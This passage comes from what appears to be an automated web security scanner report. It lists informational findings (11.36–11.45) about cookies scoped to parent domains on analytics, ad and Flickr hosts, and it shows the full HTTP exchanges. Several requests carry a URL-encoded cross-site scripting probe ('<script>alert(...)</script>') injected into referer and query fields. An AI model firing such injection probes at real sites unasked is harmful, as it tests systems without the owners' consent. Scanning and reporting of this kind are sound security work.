s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:17:59 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:17:59 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:17:59 GMT
Last-Modified: Wed, 15 Jun 2011 00:17:59 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6A8B7-2795-26D30142"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www22
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
11.36. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s94813384910564  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s94813384910564

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s94813384910564?AQB=1&ndh=1&t=13%2F5%2F2011%2012%3A45%3A5%201%20300&ce=UTF-8&g=http%3A%2F%2Fhollywoodcrush.mtv.com%2Ffavicon.ico4bc7e%253C%2Fscript%253E%253Cscript%253Ealert(%2522FAVICON%2522)%253C%2Fscript%253E4e5acb99ae0&r=http%3A%2F%2Fhollywoodcrush.mtv.com%2Ffavicon.ico4bc7e%253C%2Fscript%253E%253Cscript%253Ealert(%2522FAVICON%2522)%253C%2Fscript%253E4e5acb99ae0&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1064&bh=782&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BJava%20Deployment%20Toolkit%206.0.240.7%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&pe=lnk_o&pev2=GLOBAL_NAV%20-%20Shows&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://hollywoodcrush.mtv.com/favicon.ico4bc7e%3C/script%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E4e5acb99ae0
Cookie: s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26E4A3B485010447-40000104C02528FD|4DE9202B[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmqljpxxjmx7Euvx7Bxxu=[CS]v4|26E4A3B485010447-40000104C02528FF|4DCBEC0F[CE]; s_vi_kxxwwupgxxbrbssx7Dx7Evb=[CS]v4|26E4A3B485010447-40000104C0252901|4DCBEC0F[CE]; s_vi_wdkkilx7Bdx7Ejhhf=[CS]v4|26E4A3B485010447-40000104C0252903|4DCBEC0F[CE]; s_vi_x7Fbynyjhx60hdf=[CS]v4|26E8932C05013A3F-4000010D601C5BFC|4DD12656[CE]; s_vi_x7Exxiexxzlcd8=[CS]v4|26E936F105010E6D-400001094010E770|4DD26DDE[CE]; s_vi_sudhuw5=[CS]v4|26E936F105010E6D-400001094010E772|4DD26DDE[CE]; s_vi_sq9x60qwx7Czx7Bxxx7Bsx7Dgx609vxxx7Bs=[CS]v4|26E9450985013445-60000111A028A0F7|4DD28A11[CE]; s_vi_jhx20ehlayetx60lj=[CS]v4|26E9450B05010169-6000011420003628|4DD28A12[CE]; s_vi_x60bx2A5770=[CS]v4|26E944E80501139F-400001146012D548|4DD289CE[CE]; s_vi_dzgdlx7Bjfd=[CS]v4|26F337640516051F-40000183803A84E3|4DE66EC8[CE]; s_vi_dinydefxxelh=[CS]v4|26F3ECFC85010184-60000102A027FC52|4DE7D9F7[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48EA28515A39E-60000176E0013A13|4DE94838[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48EA28515A39E-60000176E0013A15|4DE94838[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F4901685012D6D-60000108602DDC58|4DE9202B[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 17:45:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FB2652050110F1-60000111E00FD64C|4DF64CA3[CE]; Expires=Sat, 11 Jun 2016 17:45:08 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 12 Jun 2011 17:45:08 GMT
Last-Modified: Tue, 14 Jun 2011 17:45:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF64CA4-21CD-03D94B21"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www143
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
11.37. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s9683568101997  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s9683568101997

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s9683568101997?AQB=1&ndh=1&t=13%2F5%2F2011%2012%3A45%3A5%201%20300&ce=UTF-8&g=http%3A%2F%2Fhollywoodcrush.mtv.com%2Ffavicon.ico4bc7e%253C%2Fscript%253E%253Cscript%253Ealert(%2522FAVICON%2522)%253C%2Fscript%253E4e5acb99ae0&r=http%3A%2F%2Fhollywoodcrush.mtv.com%2Ffavicon.ico4bc7e%253C%2Fscript%253E%253Cscript%253Ealert(%2522FAVICON%2522)%253C%2Fscript%253E4e5acb99ae0&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1064&bh=782&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BJava%20Deployment%20Toolkit%206.0.240.7%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&pe=lnk_o&pev2=GLOBAL_NAV%20-%20Shows&pid=http%3A%2F%2Fhollywoodcrush.mtv.com%2Ffavicon.ico4bc7e%253C%2Fscript%253E%253Cscript%253Ealert(%2522FAVICON%2522)%253C%2Fscript%253E4e5acb99ae0&oid=http%3A%2F%2Fwww.mtv.com%2Fontv%2F&ot=A&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://hollywoodcrush.mtv.com/favicon.ico4bc7e%3C/script%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E4e5acb99ae0
Cookie: s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26E4A3B485010447-40000104C02528FD|4DE9202B[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmqljpxxjmx7Euvx7Bxxu=[CS]v4|26E4A3B485010447-40000104C02528FF|4DCBEC0F[CE]; s_vi_kxxwwupgxxbrbssx7Dx7Evb=[CS]v4|26E4A3B485010447-40000104C0252901|4DCBEC0F[CE]; s_vi_wdkkilx7Bdx7Ejhhf=[CS]v4|26E4A3B485010447-40000104C0252903|4DCBEC0F[CE]; s_vi_x7Fbynyjhx60hdf=[CS]v4|26E8932C05013A3F-4000010D601C5BFC|4DD12656[CE]; s_vi_x7Exxiexxzlcd8=[CS]v4|26E936F105010E6D-400001094010E770|4DD26DDE[CE]; s_vi_sudhuw5=[CS]v4|26E936F105010E6D-400001094010E772|4DD26DDE[CE]; s_vi_sq9x60qwx7Czx7Bxxx7Bsx7Dgx609vxxx7Bs=[CS]v4|26E9450985013445-60000111A028A0F7|4DD28A11[CE]; s_vi_jhx20ehlayetx60lj=[CS]v4|26E9450B05010169-6000011420003628|4DD28A12[CE]; s_vi_x60bx2A5770=[CS]v4|26E944E80501139F-400001146012D548|4DD289CE[CE]; s_vi_dzgdlx7Bjfd=[CS]v4|26F337640516051F-40000183803A84E3|4DE66EC8[CE]; s_vi_dinydefxxelh=[CS]v4|26F3ECFC85010184-60000102A027FC52|4DE7D9F7[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48EA28515A39E-60000176E0013A13|4DE94838[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48EA28515A39E-60000176E0013A15|4DE94838[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F4901685012D6D-60000108602DDC58|4DE9202B[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 17:45:09 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FB265285012DDF-4000011560195241|4DF64CA4[CE]; Expires=Sat, 11 Jun 2016 17:45:09 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 12 Jun 2011 17:45:09 GMT
Last-Modified: Tue, 14 Jun 2011 17:45:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF64CA5-5BAC-64456BC1"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www171
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
11.38. http://www.alexa.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alexa.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.alexa.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1307189053; __utmz=115222615.1307189057.1.1.utmcsr=abouturl.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=115222615.2052008441.1307189057.1307189057.1307189057.1

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Set-Cookie: rpt=%21; expires=Wed, 15-Jun-2011 01:28:41 GMT; domain=alexa.com
Set-Cookie: lv=1308011321; expires=Wed, 13-Jun-2012 06:28:41 GMT; path=/; domain=alexa.com
Vary: Accept-Encoding
Content-Length: 16431
Connection: close
Date: Tue, 14 Jun 2011 00:28:41 GMT
Server: httpd

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
11.39. http://www.bizographics.com/collect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /collect/?fmt=gif&url=wsj.com&pid=317&rnd=1227491837926209 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/resources/documents/PixelTracking.html?site=interactive.wsj.com&zone=tech_front&pageId=0_0_WP_2200&cb=883697
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe0eegii5ngkZAFExkNK7HUtFp4B4dlWpgdiiC2v8NccltET8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VeiijpGQmKo0yuNJRFsRyXovJBpP1LisJ3SSZWr1XIQIIGVWMEmHtfZh73BiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Tue, 14 Jun 2011 00:13:56 GMT
Location: http://img.bizographics.com/1x1.gif
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; Domain=.bizographics.com; Expires=Tue, 13-Dec-2011 12:13:56 GMT; Path=/
Set-Cookie: BizoData=AceyGjXAruisipsmZAT3ZKk9Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe0LyJwxxR2So1ExkNK7HUtFp4B4dlWpgdjiitVjmZ1zW4j8l3ZY0x538ism9qBDYo7JFUsjoCeA3EOXnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRSTI80GqzWbM6jqUuMlvisCEVUJBxdqAyBlRxxKsMZXIqipS0JipOOoD0R50a7lE1cBQipNN9QFd9eD7q0ii95BlORQkTqQOyFqsEcggxAnMEZgmSj4bIddpEGisTfkPzrOvT6EHuRZNgOOtPKCBwYlvwyxBTxBmxysG3aTEKOduu6SE3HipAaq47ss9D2D3XiirmwcmKlBdv1ZVcwOipUiiqfwoqJRljWvSvhZfgeAie; Domain=.bizographics.com; Expires=Tue, 13-Dec-2011 12:13:56 GMT; Path=/
Content-Length: 0
Connection: keep-alive

11.40. http://www.burstnet.com/burstnetwork/display/s=21868/a=t/v=4.0S/sz=1X1A/BCPG173588.250890.299265/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /burstnetwork/display/s=21868/a=t/v=4.0S/sz=1X1A/BCPG173588.250890.299265/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /burstnetwork/display/s=21868/a=t/v=4.0S/sz=1X1A/BCPG173588.250890.299265/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3CbhLH0eE71Hn7nncNGs58ZzJ-iRGtORm29qwWhWLJGJgcvEZ9HqbVw; /PC=0

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Location: http://origin-www.burstnet.akadns.net/gifs/zero.gif
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:14:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TID=16vda0204fei8g; path=/; expires=Mon, 12-Sep-2011 00:14:58 GMT; domain=.burstnet.com
Set-Cookie: /VTS.12067=2ujLG.yIpQ; path=/
Set-Cookie: /ad21868.12067=,CFC,GFC; path=/
Content-Length: 658

HTTP/1.1 302 Found
Date: Tue, 14 Jun 2011 00:14:58 GMT
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: TI
...[SNIP]...
11.41. http://www.flickr.com/about/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /about/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/ HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; fl_v=souhp; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:29 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:23:29 GMT; path=/; domain=.flickr.com
X-Served-By: www14.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Via: HTTP/1.1 r23.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r22.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 70254

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>

   <title>About Flickr</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta na
...[SNIP]...
11.42. http://www.flickr.com/abuse/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /abuse/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /abuse/ HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/report_abuse.gne
Content-Length: 66
Cache-Control: max-age=0
Origin: http://www.flickr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; fl_v=souhp; localization=en-us%3Bus%3Bus

goback=http%3A%2F%2Fwww.flickr.com%2Fabout%2F&abusecat=abuse_other

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:24:44 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:24:44 GMT; path=/; domain=.flickr.com
X-Served-By: www69.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Via: HTTP/1.1 r11.ycpi.mud.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r20.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 56237

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>

   <title>Flickr: Report Abuse</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   
...[SNIP]...
11.43. http://www.flickr.com/beacon_page_timings.gne  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /beacon_page_timings.gne

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /beacon_page_timings.gne?page_start=1308010986257&head_end=1308010987732&body_start=1308010987740&page_end=1308010987761&head_js_start=1308010986259&head_js_end=1308010987722&head_css_start=1308010987722&head_css_end=1308010987732&photo_start=undefined&photo_end=undefined&dom_ready=1308010987762&window_load=1308010995917&page_generation=849&image_count=26&dom_script_external_count=3&dom_script_inline_count=5&is_logged_in=0&is_pro=undefined&is_owner=false&js_assets_start=1308010987751&js_assets_end=1308010987751&timing_pageid=soup&js_done=1308010992746&seed_fetch_start=1308010986266&seed_fetch_end=1308010987722&js_done_chrome=1308010992746 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; fl_v=souhp; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:16 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:23:16 GMT; path=/; domain=.flickr.com
X-Served-By: www133.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Via: HTTP/1.1 r08.ycpi.mud.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r24.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 0

11.44. http://www.flickr.com/flanal_event.gne  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /flanal_event.gne

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flanal_event.gne?target=flickr.soup.pv&title=test_pvs_x1&rand=0.7009030901826918 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; localization=en-us%3Bus%3Bus; fl_v=souhp

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:13 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:23:13 GMT; path=/; domain=.flickr.com
X-Served-By: www105.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Via: HTTP/1.1 r15.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r21.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 0

11.45. http://www.flickr.com/fragment.gne  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /fragment.gne

Issue detail

